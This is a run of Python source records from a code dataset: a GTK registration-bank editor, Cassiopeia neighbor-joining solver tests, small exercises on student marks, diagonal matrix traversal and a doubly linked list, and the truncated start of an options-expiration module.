ObjectList\n by piping all registrations through the filter method\n »filterSingleEntry«.\n\n This handler responds to »reglist-updated« and »keyboard-model-changed«\n events of the own class. But it also connects to the filter criterion's\n combobox so that it gets called whenever the user selects a different\n criterion.\n '''\n # Update only if filter mode changed\n currentFilter = self.cbxNewBankAvailFilter.get_selected()\n\n if currentFilter == self.prevFilter:\n return\n\n # Pipe entries through filter to ObjectList\n self.oblAvailableRegs.clear()\n\n for regEntry in self.allRegs:\n try:\n # Test for filter and add to display list\n self.filterSingleEntry(regEntry, currentFilter)\n self.oblAvailableRegs.append(regEntry)\n except appexceptions.DoesNotMatchFilter:\n # Filtered out entry\n pass\n\n # Remember filter criterion\n self.prevFilter = currentFilter\n\n # Tell the world\n self.emit(\"filter-updated\")\n\n\n def filterSingleEntry(self, regEntry, filter):\n '''\n Filter test method which tests the given RegEntry object against the\n given filter. Return nothing on success, throws an exception of type\n appexceptions.DoesNotMatchFilter on negative result.\n '''\n # Check for universal models\n if regEntry.model == const.ALL_MODELS:\n return\n\n # Check filter criteria\n if filter == const.FILTER_NONE:\n return\n\n elif filter == const.FILTER_MODEL:\n if regEntry.model == self.getNewBankKeyboardName():\n return\n else:\n raise appexceptions.DoesNotMatchFilter(regEntry, filter)\n\n elif filter == const.FILTER_COMPATIBLE:\n if regEntry.model in self.allowedKeyboardNames:\n return\n else:\n raise appexceptions.DoesNotMatchFilter(regEntry, filter)\n\n\n # Export list of new bank file ............................................\n\n def onNewBankEmptyChanged(self, list, hasRows):\n '''\n Delegate methode called by the UI. Gets called whenever the list of\n a new bank becomes empty or non-empty. This is cruical for activating\n and deactivating the keyboard model combobox.\n '''\n # Disable keyboard selection when export list is not empty\n self.cbxNewBankKeyModel.set_sensitive(not hasRows)\n\n # Emit newlist-changed signal\n self.emit(\"newlist-updated\")\n\n\n def newBankRegRename(self, regEntry):\n '''\n Delegate method called by UI. Responds to a renamed registration by\n checking for an empty registration. Changes to empty registrations\n will be undone other changes stay in-tact.\n '''\n # Don't allow editing of dummy registrations (### EMPTY ###)\n if not regEntry.fileName:\n regEntry.name = const.REG_NAME_EMPTY\n return\n\n\n def addSelectedItemsToExport(self):\n '''\n Delegate method called by the UI. Copies the selected items from the\n available list to the export list.\n '''\n # Get selected row\n row = self.oblAvailableRegs.get_selected()\n\n if not row:\n return\n\n\n # Check whether copying is allowed (just like DnD would do)\n if not self.checkCopyRegToNewBank(row):\n return\n\n # Copy row to export list\n self.copyColumn(self.oblAvailableRegs, self.oblNewBank, row)\n\n # Emit newlist-changed signal\n self.emit(\"newlist-updated\")\n\n\n def removeSelectedItemsFromExportList(self):\n '''\n Delegate method called by the UI. Removes all selected items from the\n export list.\n '''\n #for entry in self.oblNewBank.get_selected_rows():\n # self.oblNewBank.remove(entry)\n self.removeColumn(None, None, self.oblNewBank.get_selected())\n\n # Emit newlist-changed signal\n self.emit(\"newlist-updated\")\n\n\n def removeAllItemsFromExportList(self):\n '''\n Delegate method called by the UI. Removes all items from the export\n list.\n '''\n self.oblNewBank.clear()\n self.wndMain.setStatusMessage(const.msg[\"clear-ok\"])\n\n\n def newBankMoveSelectedUp(self):\n '''\n Delegate method called by the UI. Moves the selected registration\n of a new bank file down by one position.\n '''\n # Move selected entry up\n pos = self.oblNewBank.get_selected_row_number()\n\n if not pos or pos < 1:\n return\n\n row = self.oblNewBank.get_selected()\n self.oblNewBank.remove(row)\n\n self.oblNewBank.insert(\n index = pos - 1,\n instance = row,\n select = True\n )\n\n # Give short success message\n self.wndMain.setStatusMessage(const.msg[\"moved-one-up\"] % (row.name))\n\n\n def newBankMoveSelectedDown(self):\n '''\n Delegate method called by the UI. Moves the selected registration\n of a new bank file up by one position.\n '''\n # Move selected entry down\n pos = self.oblNewBank.get_selected_row_number()\n\n if pos < 0 or pos >= len(self.oblNewBank) - 1:\n return\n\n row = self.oblNewBank.get_selected()\n self.oblNewBank.remove(row)\n\n self.oblNewBank.insert(\n index = pos + 1,\n instance = row,\n select = True\n )\n\n # Give short success message\n self.wndMain.setStatusMessage(const.msg[\"moved-one-down\"] % (row.name))\n\n\n def saveBankFile(self):\n '''\n Delegate method called by the UI. Asks the user for a filename and\n stores all registrations from the export list in it.\n '''\n # Check for valid keyboard model\n if self.getNewBankKeyboardName() == const.UNKNOWN_MODEL \\\n or self.getNewBankKeyboardName() == const.ALL_MODELS:\n self.wndMain.setStatusMessage(const.msg[\"invalid-key-name\"])\n return\n\n model = self.getNewBankKeyboardName()\n bankClass = regbank.bankfile.BankFile.getClassForKeyboardName(model)\n\n # Ask user for file name\n fileName = kiwi.ui.dialogs.save(\n title = _(\"Save Registration Bank\"),\n parent = self.wndMain.wndMain,\n current_name = \"*.%s\" % (bankClass.fileExt)\n )\n\n if not fileName:\n return\n\n # Change processe's working directory so that file dialogs remember it\n self.main.chdirFromFilename(\n filename = fileName\n )\n\n # Read binary registration data from disk\n # And assemble list of Registration objects.\n # While at it also apply name changes.\n regList = []\n\n for regEntry in self.oblNewBank:\n regFile = regfile.regfile.RegFile(filename=regEntry.fileName)\n regObj = regFile.getRegistrationObject()\n\n if regObj:\n regObj.setName(regEntry.name)\n\n regList.append(regObj)\n\n # Append empty registrations as necessary\n missing = bankClass.maxReg - len(regList)\n\n if missing > 0:\n for i in range(missing):\n regList.append(None)\n\n # Create new bank file object\n bankFile = bankClass(keyboardName=model)\n bankFile.setRegistrationObjects(regList)\n\n # Store file to disk\n bankFile.storeBankFile(fileName)\n\n # Show success message\n self.wndMain.setStatusMessage(const.msg[\"bank-save-ok\"] % (fileName))\n\n\n def getNewBankKeyboardName(self):\n '''\n Determines the technical keyboard name (model) for which the new\n registration bank shall be created. As of version 0.2 this is just\n the model selected in the keyboard model combobox.\n '''\n # Retrieve selected keyboard model\n return self.cbxNewBankKeyModel.get_selected_data()\n\n\n def onKeyboardModelChanged(self, widget):\n '''\n Delegate methode called by the UI whenever the user selects another\n keyboard model from the combobox.\n '''\n # Retrieve list of allowed keyboard models (for mix-in)\n keyName = self.getNewBankKeyboardName()\n\n if keyName == const.UNKNOWN_MODEL \\\n or keyName == const.ALL_MODELS:\n self.allowedKeyboardNames = []\n else:\n regClass = regbank.bankfile.BankFile.getClassForKeyboardName(keyboardName=keyName)\n self.allowedKeyboardNames = regClass.getAllKeyboardNames()\n\n # Update filter\n if not self.prevFilter == const.FILTER_NONE:\n self.prevFilter = const.FILTER_UNDEFINED\n\n # Notify handlers\n self.emit(\"keyboard-model-changed\")\n\n\n # Drag and drop support....................................................\n\n def checkCopyRegToNewBank(self, row):\n '''\n This method gets called by an EasyDragAndDrop object which implements\n the drag and drop behaviour for both TreeViews.\n '''\n # Check keyboard model\n newBankModel = self.getNewBankKeyboardName()\n RegModel = row.model\n\n if newBankModel == const.UNKNOWN_MODEL:\n self.wndMain.setStatusMessage(const.msg[\"invalid-key-name\"])\n return False\n\n elif not RegModel in self.allowedKeyboardNames \\\n and not RegModel == const.ALL_MODELS \\\n and not newBankModel == const.ALL_MODELS:\n self.wndMain.setStatusMessage(\n const.msg[\"incompatible-keys\"] % {\n \"srcName\": const.keyboardNameLong[RegModel],\n \"dstName\": const.keyboardNameLong[newBankModel],\n }\n )\n return False\n\n # Check maximum amount\n bankClass = regbank.bankfile.BankFile.getClassForKeyboardName(newBankModel)\n\n if len(self.oblNewBank) >= bankClass.maxReg:\n self.wndMain.setStatusMessage(const.msg[\"max-allowed-regs\"] % (bankClass.maxReg))\n return False\n\n # Grant if nothing found\n return True\n\n\n def getDataNewBank(self):\n '''\n Callback function used by EasyDragAndDrop in order to query selected\n data dragged from \"New Bank\" list back to \"Available Registrations\"\n list.\n '''\n return self.oblNewBank.get_selected()\n\n\n def getDataAvailableRegs(self):\n '''\n Callback function used by EasyDragAndDrop in order to query selected\n data dragged from \"Available Registrations\" list to \"New Bank\" list.\n '''\n return self.oblAvailableRegs.get_selected()\n\n\n def copyColumn(self, src, dst, row):\n '''\n This method copies the given column from source ObjectList to\n destination ObjectList. It's not meant for direct use. Instead it's\n passed to an EasyDragAndDrop instance.\n '''\n dst.append(row.copy())\n self.wndMain.setStatusMessage(const.msg[\"added-to-bank\"] % (row.name))\n\n # Emit newlist-changed signal\n if dst == self.oblNewBank:\n self.emit(\"newlist-updated\")\n\n\n def removeColumn(self, src, dst, row):\n '''\n This method removes the given column from the source ObjectList. It's\n not meant for direct use. Instead it's passed to an EasyDragAndDrop\n instance.\n '''\n if not row:\n return\n\n self.oblNewBank.remove(row)\n self.wndMain.setStatusMessage(const.msg[\"removed-from-bank\"] % (row.name))\n\n\n # User aids ...............................................................\n\n def checkAllowedButtons(self, *data):\n '''\n Event handler which reacts to several events. It checks which buttons\n after the event are valid and disables all invalid buttons.\n '''\n # Calculate button validity\n btnAdd = True\n btnRemove = True\n btnBatch = True\n btnSave = True\n btnClear = True\n btnUp = True\n btnDown = True\n\n if self.getNewBankKeyboardName() == const.UNKNOWN_MODEL \\\n or self.getNewBankKeyboardName() == const.ALL_MODELS:\n btnAdd = False\n btnBatch = False\n btnSave = False\n\n if len(self.oblNewBank) < 1:\n btnRemove = False\n btnClear = False\n\n if len(self.oblNewBank) < 2:\n btnUp = False\n btnDown = False\n\n if len(self.oblAvailableRegs) < 2:\n # NOTE: ### EMPTY ### entry does always exist\n btnAdd = False\n btnBatch = False\n\n # Disable invalid buttons\n self.wndMain.btnAddSelected.set_sensitive(btnAdd)\n self.wndMain.btnRemoveSelected.set_sensitive(btnRemove)\n self.wndMain.btnBatch.set_sensitive(btnBatch)\n self.wndMain.btnSaveBank.set_sensitive(btnSave)\n self.wndMain.btnClearList.set_sensitive(btnClear)\n self.wndMain.btnNewUp.set_sensitive(btnUp)\n self.wndMain.btnNewDown.set_sensitive(btnDown)\n\n\n # Widget specific event handlers...........................................\n\n def on_oblAvailableRegs_cell_edited(self, *args): # Manually connected\n '''\n Event handler which responds whenever the user edits the name of\n an available registration. The change will be stored to the associated\n regfile which will also renamed.\n '''\n self.availableRegRename(args[1])\n\n\n def on_oblNewBank_cell_edited(self, *args): # Manually connected\n '''\n Event handler which responds whenever the user edits the name of\n a registration of a new bank. The call gets delegated to method\n newBankRegRename of the same class.\n '''\n self.newBankRegRename(args[1])\n","repo_name":"DennisSchulmeister/psr-reg-shuffle-v0","sub_path":"trunk/src/createbanktab.py","file_name":"createbanktab.py","file_ext":"py","file_size_in_byte":28012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18908134906","text":"\"\"\"\nTest NeighborJoiningSolver in Cassiopeia.solver.\n\"\"\"\nimport unittest\nfrom typing import Dict, Optional\nfrom unittest import mock\n\nimport itertools\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\n\nimport cassiopeia as cas\n\n\ndef find_triplet_structure(triplet, T):\n a, b, c = triplet[0], triplet[1], triplet[2]\n a_ancestors = [node for node in nx.ancestors(T, a)]\n b_ancestors = [node for node in nx.ancestors(T, b)]\n c_ancestors = [node for node in nx.ancestors(T, c)]\n ab_common = len(set(a_ancestors) & set(b_ancestors))\n ac_common = len(set(a_ancestors) & set(c_ancestors))\n bc_common = len(set(b_ancestors) & set(c_ancestors))\n structure = \"-\"\n if ab_common > bc_common and ab_common > ac_common:\n structure = \"ab\"\n elif ac_common > bc_common and ac_common > ab_common:\n structure = \"ac\"\n elif bc_common > ab_common and bc_common > ac_common:\n structure = \"bc\"\n return structure\n\n\n# specify dissimilarity function for solvers to use\ndef delta_fn(\n x: np.array,\n y: np.array,\n missing_state: int,\n priors: Optional[Dict[int, Dict[int, float]]],\n):\n d = 0\n for i in range(len(x)):\n if x[i] != y[i]:\n d += 1\n return d\n\n\nclass TestNeighborJoiningSolver(unittest.TestCase):\n def setUp(self):\n\n # --------------------- General NJ ---------------------\n cm = pd.DataFrame.from_dict(\n {\n \"a\": [0, 1, 2],\n \"b\": [1, 1, 2],\n \"c\": [2, 2, 2],\n \"d\": [1, 1, 1],\n \"e\": [0, 0, 0],\n },\n orient=\"index\",\n columns=[\"x1\", \"x2\", \"x3\"],\n )\n\n delta = pd.DataFrame.from_dict(\n {\n \"a\": [0, 15, 21, 17, 12],\n \"b\": [15, 0, 10, 6, 17],\n \"c\": [21, 10, 0, 10, 23],\n \"d\": [17, 6, 10, 0, 19],\n \"e\": [12, 17, 23, 19, 0],\n },\n orient=\"index\",\n columns=[\"a\", \"b\", \"c\", \"d\", \"e\"],\n )\n\n self.cm = cm\n self.basic_dissimilarity_map = delta\n self.basic_tree = cas.data.CassiopeiaTree(\n character_matrix=cm, dissimilarity_map=delta, root_sample_name=\"b\"\n )\n\n self.nj_solver = cas.solver.NeighborJoiningSolver(add_root=True)\n\n # ---------------- Lineage Tracing NJ ----------------\n\n pp_cm = pd.DataFrame.from_dict(\n {\n \"a\": [1, 1, 0],\n \"b\": [1, 2, 0],\n \"c\": [1, 2, 1],\n \"d\": [2, 0, 0],\n \"e\": [2, 0, 2],\n },\n orient=\"index\",\n columns=[\"x1\", \"x2\", \"x3\"],\n )\n\n self.pp_tree = cas.data.CassiopeiaTree(character_matrix=pp_cm)\n\n self.nj_solver_delta = cas.solver.NeighborJoiningSolver(\n dissimilarity_function=delta_fn, add_root=True\n )\n\n # ------------- CM with Duplictes -----------------------\n duplicates_cm = pd.DataFrame.from_dict(\n {\n \"a\": [1, 1, 0],\n \"b\": [1, 2, 0],\n \"c\": [1, 2, 1],\n \"d\": [2, 0, 0],\n \"e\": [2, 0, 2],\n \"f\": [2, 0, 2],\n },\n orient=\"index\",\n columns=[\"x1\", \"x2\", \"x3\"],\n )\n\n self.duplicate_tree = cas.data.CassiopeiaTree(\n character_matrix=duplicates_cm\n )\n\n # ------------- NJ with modified hamming dissimilarity ------------\n priors = {0: {1: 0.5, 2: 0.5}, 1: {1: 0.2, 2: 0.8}, 2: {1: 0.3, 2: 0.7}}\n self.pp_tree_priors = cas.data.CassiopeiaTree(\n character_matrix=pp_cm, priors=priors\n )\n self.nj_solver_modified = cas.solver.NeighborJoiningSolver(\n dissimilarity_function=cas.solver.dissimilarity.weighted_hamming_distance,\n add_root=True,\n )\n\n def test_constructor(self):\n self.assertIsNotNone(self.nj_solver_delta.dissimilarity_function)\n self.assertIsNotNone(self.basic_tree.get_dissimilarity_map())\n\n nothing_solver = cas.solver.NeighborJoiningSolver(\n dissimilarity_function=None, add_root=False\n )\n\n no_root_tree = cas.data.CassiopeiaTree(\n character_matrix=self.cm,\n dissimilarity_map=self.basic_dissimilarity_map,\n )\n\n with self.assertRaises(cas.solver.DistanceSolver.DistanceSolverError):\n nothing_solver.solve(no_root_tree)\n\n no_root_solver = cas.solver.NeighborJoiningSolver(\n dissimilarity_function=None, add_root=True\n )\n\n with self.assertRaises(cas.solver.DistanceSolver.DistanceSolverError):\n no_root_solver.solve(no_root_tree)\n\n root_only_tree = cas.data.CassiopeiaTree(\n character_matrix=self.cm, root_sample_name=\"b\"\n )\n\n with self.assertRaises(cas.solver.DistanceSolver.DistanceSolverError):\n nothing_solver.solve(root_only_tree)\n\n nj_solver_fn = cas.solver.NeighborJoiningSolver(\n add_root=True, dissimilarity_function=delta_fn\n )\n nj_solver_fn.solve(self.basic_tree)\n\n self.assertEqual(\n self.basic_tree.get_dissimilarity_map().loc[\"a\", \"b\"], 15\n )\n\n def test_compute_q(self):\n q_vals = self.nj_solver.compute_q(self.basic_dissimilarity_map.values)\n\n expected_q = pd.DataFrame.from_dict(\n {\n \"state0\": [0, -22.67, -22, -22, -33.33],\n \"state1\": [-22.67, 0, -27.33, -27.33, -22.67],\n \"state2\": [-22, -27.33, 0, -28.67, -22],\n \"state3\": [-22, -27.33, -28.67, 0, -22],\n \"state4\": [-33.33, -22.67, -22, -22, 0],\n },\n orient=\"index\",\n columns=[\"state0\", \"state2\", \"state3\", \"state4\", \"state5\"],\n )\n\n self.assertTrue(np.allclose(q_vals, expected_q, atol=0.1))\n\n def test_find_cherry(self):\n\n cherry = self.nj_solver.find_cherry(self.basic_dissimilarity_map.values)\n delta = self.basic_dissimilarity_map\n node_i, node_j = (delta.index[cherry[0]], delta.index[cherry[1]])\n\n self.assertIn((node_i, node_j), [(\"a\", \"e\"), (\"e\", \"a\")])\n\n def test_update_dissimilarity_map(self):\n\n delta = self.basic_dissimilarity_map\n\n cherry = self.nj_solver.find_cherry(delta.values)\n node_i, node_j = (delta.index[cherry[0]], delta.index[cherry[1]])\n\n delta = self.nj_solver.update_dissimilarity_map(\n delta, (node_i, node_j), \"f\"\n )\n\n expected_delta = pd.DataFrame.from_dict(\n {\n \"f\": [0, 10, 16, 12],\n \"b\": [10, 0, 10, 6],\n \"c\": [16, 10, 0, 10],\n \"d\": [12, 6, 10, 0],\n },\n orient=\"index\",\n columns=[\"f\", \"b\", \"c\", \"d\"],\n )\n\n for sample in expected_delta.index:\n for sample2 in expected_delta.index:\n self.assertEqual(\n delta.loc[sample, sample2],\n expected_delta.loc[sample, sample2],\n )\n\n def test_basic_solver(self):\n\n self.nj_solver.solve(self.basic_tree)\n\n # test leaves exist in tree\n _leaves = self.basic_tree.leaves\n\n self.assertEqual(\n len(_leaves), self.basic_dissimilarity_map.shape[0] - 1\n )\n for _leaf in _leaves:\n self.assertIn(_leaf, self.basic_dissimilarity_map.index.values)\n\n # test for expected number of edges\n edges = list(self.basic_tree.edges)\n self.assertEqual(len(edges), 6)\n\n # test relationships between samples\n expected_tree = nx.DiGraph()\n expected_tree.add_edges_from(\n [\n (\"5\", \"a\"),\n (\"5\", \"e\"),\n (\"6\", \"5\"),\n (\"b\", \"6\"),\n (\"6\", \"7\"),\n (\"7\", \"d\"),\n (\"7\", \"c\"),\n ]\n )\n\n observed_tree = self.basic_tree.get_tree_topology()\n triplets = itertools.combinations([\"a\", \"c\", \"d\", \"e\"], 3)\n for triplet in triplets:\n expected_triplet = find_triplet_structure(triplet, expected_tree)\n observed_triplet = find_triplet_structure(triplet, observed_tree)\n self.assertEqual(expected_triplet, observed_triplet)\n\n self.nj_solver.solve(self.basic_tree, collapse_mutationless_edges=True)\n expected_tree = nx.DiGraph()\n expected_tree.add_nodes_from([\"a\", \"b\", \"c\", \"d\", \"e\", \"5\", \"6\", \"7\"])\n expected_tree.add_edges_from(\n [(\"6\", \"a\"), (\"6\", \"e\"), (\"b\", \"6\"), (\"6\", \"d\"), (\"6\", \"c\")]\n )\n observed_tree = self.basic_tree.get_tree_topology()\n triplets = itertools.combinations([\"a\", \"c\", \"d\", \"e\"], 3)\n for triplet in triplets:\n expected_triplet = find_triplet_structure(triplet, expected_tree)\n observed_triplet = find_triplet_structure(triplet, observed_tree)\n self.assertEqual(expected_triplet, observed_triplet)\n\n # compare tree distances\n observed_tree = observed_tree.to_undirected()\n expected_tree = expected_tree.to_undirected()\n for i in range(len(_leaves)):\n sample1 = _leaves[i]\n for j in range(i + 1, len(_leaves)):\n sample2 = _leaves[j]\n self.assertEqual(\n nx.shortest_path_length(observed_tree, sample1, sample2),\n nx.shortest_path_length(expected_tree, sample1, sample2),\n )\n\n def test_nj_solver_weights(self):\n self.nj_solver_modified.solve(self.pp_tree_priors)\n observed_tree = self.pp_tree_priors.get_tree_topology()\n\n expected_tree = nx.DiGraph()\n expected_tree.add_edges_from(\n [\n (\"root\", \"7\"),\n (\"7\", \"6\"),\n (\"6\", \"d\"),\n (\"6\", \"e\"),\n (\"7\", \"8\"),\n (\"8\", \"a\"),\n (\"8\", \"9\"),\n (\"9\", \"b\"),\n (\"9\", \"c\"),\n ]\n )\n\n triplets = itertools.combinations([\"a\", \"b\", \"c\", \"d\", \"e\"], 3)\n for triplet in triplets:\n expected_triplet = find_triplet_structure(triplet, expected_tree)\n observed_triplet = find_triplet_structure(triplet, observed_tree)\n self.assertEqual(expected_triplet, observed_triplet)\n\n self.nj_solver_modified.solve(\n self.pp_tree_priors, collapse_mutationless_edges=True\n )\n observed_tree = self.pp_tree_priors.get_tree_topology()\n for triplet in triplets:\n expected_triplet = find_triplet_structure(triplet, expected_tree)\n observed_triplet = find_triplet_structure(triplet, observed_tree)\n self.assertEqual(expected_triplet, observed_triplet)\n\n def test_pp_solver(self):\n\n self.nj_solver_delta.solve(self.pp_tree)\n observed_tree = self.pp_tree.get_tree_topology()\n\n expected_tree = nx.DiGraph()\n expected_tree.add_edges_from(\n [\n (\"root\", \"9\"),\n (\"9\", \"8\"),\n (\"9\", \"7\"),\n (\"7\", \"6\"),\n (\"7\", \"a\"),\n (\"6\", \"b\"),\n (\"6\", \"c\"),\n (\"8\", \"e\"),\n (\"8\", \"d\"),\n ]\n )\n\n triplets = itertools.combinations([\"a\", \"b\", \"c\", \"d\", \"e\"], 3)\n for triplet in triplets:\n expected_triplet = find_triplet_structure(triplet, expected_tree)\n observed_triplet = find_triplet_structure(triplet, observed_tree)\n self.assertEqual(expected_triplet, observed_triplet)\n\n self.nj_solver_delta.solve(\n self.pp_tree, collapse_mutationless_edges=True\n )\n observed_tree = self.pp_tree.get_tree_topology()\n for triplet in triplets:\n expected_triplet = find_triplet_structure(triplet, expected_tree)\n observed_triplet = find_triplet_structure(triplet, observed_tree)\n self.assertEqual(expected_triplet, observed_triplet)\n\n def test_duplicate_sample_neighbor_joining(self):\n\n self.nj_solver_delta.solve(self.duplicate_tree)\n observed_tree = self.duplicate_tree.get_tree_topology()\n\n expected_tree = nx.DiGraph()\n expected_tree.add_edges_from(\n [\n (\"root\", \"9\"),\n (\"9\", \"8\"),\n (\"9\", \"7\"),\n (\"7\", \"6\"),\n (\"7\", \"a\"),\n (\"6\", \"b\"),\n (\"6\", \"c\"),\n (\"8\", \"10\"),\n (\"10\", \"e\"),\n (\"10\", \"f\"),\n (\"8\", \"d\"),\n ]\n )\n\n triplets = itertools.combinations([\"a\", \"b\", \"c\", \"d\", \"e\", \"f\"], 3)\n for triplet in triplets:\n expected_triplet = find_triplet_structure(triplet, expected_tree)\n observed_triplet = find_triplet_structure(triplet, observed_tree)\n self.assertEqual(expected_triplet, observed_triplet)\n\n def test_setup_root_finder_missing_dissimilarity_map(self):\n tree = cas.data.CassiopeiaTree(character_matrix=self.cm)\n with mock.patch.object(\n tree, \"compute_dissimilarity_map\"\n ) as compute_dissimilarity_map:\n self.nj_solver_delta.setup_root_finder(tree)\n compute_dissimilarity_map.assert_called_once_with(\n delta_fn, \"negative_log\", threads=1\n )\n self.assertEqual(tree.root_sample_name, \"root\")\n\n def test_setup_root_finder_existing_dissimilarity_map(self):\n tree = cas.data.CassiopeiaTree(\n character_matrix=self.cm,\n dissimilarity_map=self.basic_dissimilarity_map,\n )\n with mock.patch.object(\n tree, \"compute_dissimilarity_map\"\n ) as compute_dissimilarity_map:\n self.nj_solver_delta.setup_root_finder(tree)\n compute_dissimilarity_map.assert_not_called()\n self.assertEqual(tree.root_sample_name, \"root\")\n dissimilarity_map = tree.get_dissimilarity_map()\n self.assertEqual(\n {\"a\", \"b\", \"c\", \"d\", \"e\", \"root\"}, set(dissimilarity_map.index)\n )\n self.assertEqual(\n {\"a\", \"b\", \"c\", \"d\", \"e\", \"root\"}, set(dissimilarity_map.columns)\n )\n for leaf in self.cm.index:\n delta = delta_fn(\n [0] * tree.n_character,\n self.cm.loc[leaf].values,\n tree.missing_state_indicator,\n None,\n )\n self.assertEqual(dissimilarity_map.loc[leaf, \"root\"], delta)\n self.assertEqual(dissimilarity_map.loc[\"root\", leaf], delta)\n self.assertEqual(dissimilarity_map.loc[\"root\", \"root\"], 0)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"YosefLab/Cassiopeia","sub_path":"test/solver_tests/neighborjoining_solver_test.py","file_name":"neighborjoining_solver_test.py","file_ext":"py","file_size_in_byte":14790,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"48"} +{"seq_id":"21443801613","text":"# i) Enter student marks into an array (at least 15 elements)\r\nstudent_marks = []\r\nfor i in range(15):\r\n mark = int(input(f\"Enter the mark for student {i + 1}: \"))\r\n student_marks.append(mark)\r\n\r\n# ii) Find the highest mark using a simple sorting algorithm (e.g., selection sort)\r\ndef find_highest_mark(arr):\r\n n = len(arr)\r\n\r\n if n == 0:\r\n return None # Handle the case when the array is empty\r\n\r\n for i in range(n - 1):\r\n max_index = i\r\n for j in range(i + 1, n):\r\n if arr[j] > arr[max_index]:\r\n max_index = j\r\n arr[i], arr[max_index] = arr[max_index], arr[i] # Swap elements\r\n\r\n highest_mark = arr[0] # The highest mark will be the first element after sorting\r\n return highest_mark\r\n\r\nhighest_mark = find_highest_mark(student_marks)\r\n\r\nif highest_mark is not None:\r\n print(f\"The highest mark is {highest_mark}.\")\r\nelse:\r\n print(\"The array is empty.\")\r\n","repo_name":"Deshapriya1122/IMBS-C40032","sub_path":"Python Programming/Student marks.py","file_name":"Student marks.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20853922195","text":"# Leetcode 498\n# Given a matrix of M x N elements (M rows, N columns), return all elements of the matrix in diagonal order.\n#\ndef findDiagonalOrder(mat: List[List[int]]) -> List[int]:\n mat1 = mat\n m = len(mat1)\n if m == 0:\n return []\n n = len(mat1[0]) if m > 0 else 0\n dict_t = {}\n for i in range(m):\n for j in range(n):\n if (i + j) in dict_t.keys():\n dict_t[(i + j)].append([i, j])\n else:\n dict_t[(i + j)] = [[i, j]]\n\n list_req = []\n for k, v in dict_t.items():\n if k % 2 != 0:\n list_req.append(v)\n else:\n list_req.append(v[::-1])\n\n return [mat1[item[0]][item[1]] for sublist in list_req for item in sublist]\n","repo_name":"raghavendrahyd/leetcode_n_codesignal","sub_path":"leetcode_n_codesignal/diagonal_traversal_498.py","file_name":"diagonal_traversal_498.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37800478347","text":"\nclass Node:\n def __init__(self, data):\n self.data = data\n self.prev = None\n self.next = None\n\n\nclass linked_list:\n def __init__(self):\n self.head = None\n\n def insert_at_beginning(self, data):\n node = Node(data)\n temp = self.head\n temp.prev = node\n node.next = temp\n self.head = node\n node.prev = None\n\n def insert_at_last(self, data):\n node = Node(data)\n temp = self.head\n while(temp.next):\n temp = temp.next\n temp.next = node\n node.prev = temp\n node.next = None\n\n def insert_at_between(self, data, index):\n node = Node(data)\n temp = self.head\n for i in range(index - 1):\n temp = temp.next\n node.data = data\n node.next = temp.next\n temp.next = node\n\n def remove_at_beginning(self):\n temp = self.head\n self.head = temp.next\n temp.next = None\n\n def remove_at_last(self):\n temp = self.head.next\n prev = self.head\n while(temp.next != None):\n temp = temp.next\n prev = prev.next\n prev.next = None\n\n def remove_in_between(self, index):\n temp = self.head.next\n prev = self.head\n for i in range(index-1):\n prev = prev.next\n temp = temp.next\n prev.next = temp.next\n\n def print_list(self):\n itr = self.head\n while(itr):\n print(itr.data, end=\"-><-\")\n itr = itr.next\n print()\n\n\nif __name__ == '__main__':\n ll = linked_list()\n n1 = Node(20)\n ll.head = n1\n n2 = Node(40)\n n2.prev = n1\n n1.next = n2\n n2.next = None\n print(\"This is our Double linked list: \")\n ll.print_list()\n print()\n\n print(\"Elements added at beginning: \")\n ll.insert_at_beginning(30)\n ll.insert_at_beginning(10)\n ll.print_list()\n\n print(\"Elements added at last: \")\n ll.insert_at_last(50)\n ll.insert_at_last(60)\n ll.print_list()\n \n print(\"Elements added in between: \")\n ll.insert_at_between(10000, 2)\n ll.print_list()\n\n print(\"Now element will be deleted from beginning: \")\n ll.remove_at_beginning()\n ll.print_list()\n\n print(\"Now element will be deleted from last: \")\n ll.remove_at_last()\n ll.print_list()\n\n print(\"Now element will be deleted from between: \")\n ll.remove_in_between(1)\n ll.print_list()\n","repo_name":"Pranjal-Tripathi-01/Data_Structures_Algorithms","sub_path":"Double_Linked_list.py","file_name":"Double_Linked_list.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7003792764","text":"\"\"\"\n\n Logic required to close out any expired options and properly handle the resulting positions.\n I'm pretty sure it covers every possible outcome, but could use a through code review.\n\n\"\"\"\n\n\n\n\nimport arrow\nfrom ..accounts import Account\nfrom ..assets import Option, Call, Put, Asset\nfrom ..adapters.quotes.QuoteAdapter import QuoteAdapter\nfrom ..orders import Order, Leg\nfrom ..positions import Position\n\nfrom ..adapters.markets import MarketAdapter\n\nfrom copy import copy\nfrom math import copysign\n\n\ndef drain_asset(positions, asset, quantity):\n \"\"\"\n Generic method of reducing the quantity of assets across an entire set of positions\n This is hard to do manually because positions can duplicates and arbitrary quantities\n Traverse the entire position set reducing quantities to zero until it hits the target reduction\n \"\"\"\n remaining_quantity = quantity\n\n # get a list of positions that are opposite to the quantity we are draining\n positions = [_ for _ in positions if _.asset == asset and copysign(1,_.quantity) == copysign(1, quantity * -1)]\n for position in positions:\n\n if abs(remaining_quantity) <= abs(position.quantity):\n # there are enough quantity in this position to complete it\n position.quantity += remaining_quantity\n remaining_quantity = 0\n return remaining_quantity\n\n if abs(remaining_quantity) > abs(position.quantity):\n # we are going to have some left over\n remaining_quantity += position.quantity\n position.quantity = 0\n\n return remaining_quantity\n\ndef close_expired_options(account:Account, quote_adapter:QuoteAdapter, market_adapter:MarketAdapter):\n \"\"\"\n Process an account's positions and handle the process of closing any expired options\n :param account:\n :return:\n \"\"\"\n\n # the effect of an options expiration can be thought of as an option transaction that was forced to take place\n # at exactly its intrinsic value, along with its resulting position\n # we simulate this by processing an order to make that happen\n starting_account = copy(account)\n\n # no positions, bail\n if len(account.positions) == 0:\n return\n\n # get one quote so we can see what day it is\n current_date = quote_adapter.get_quote(asset=account.positions[0].asset.underlying if 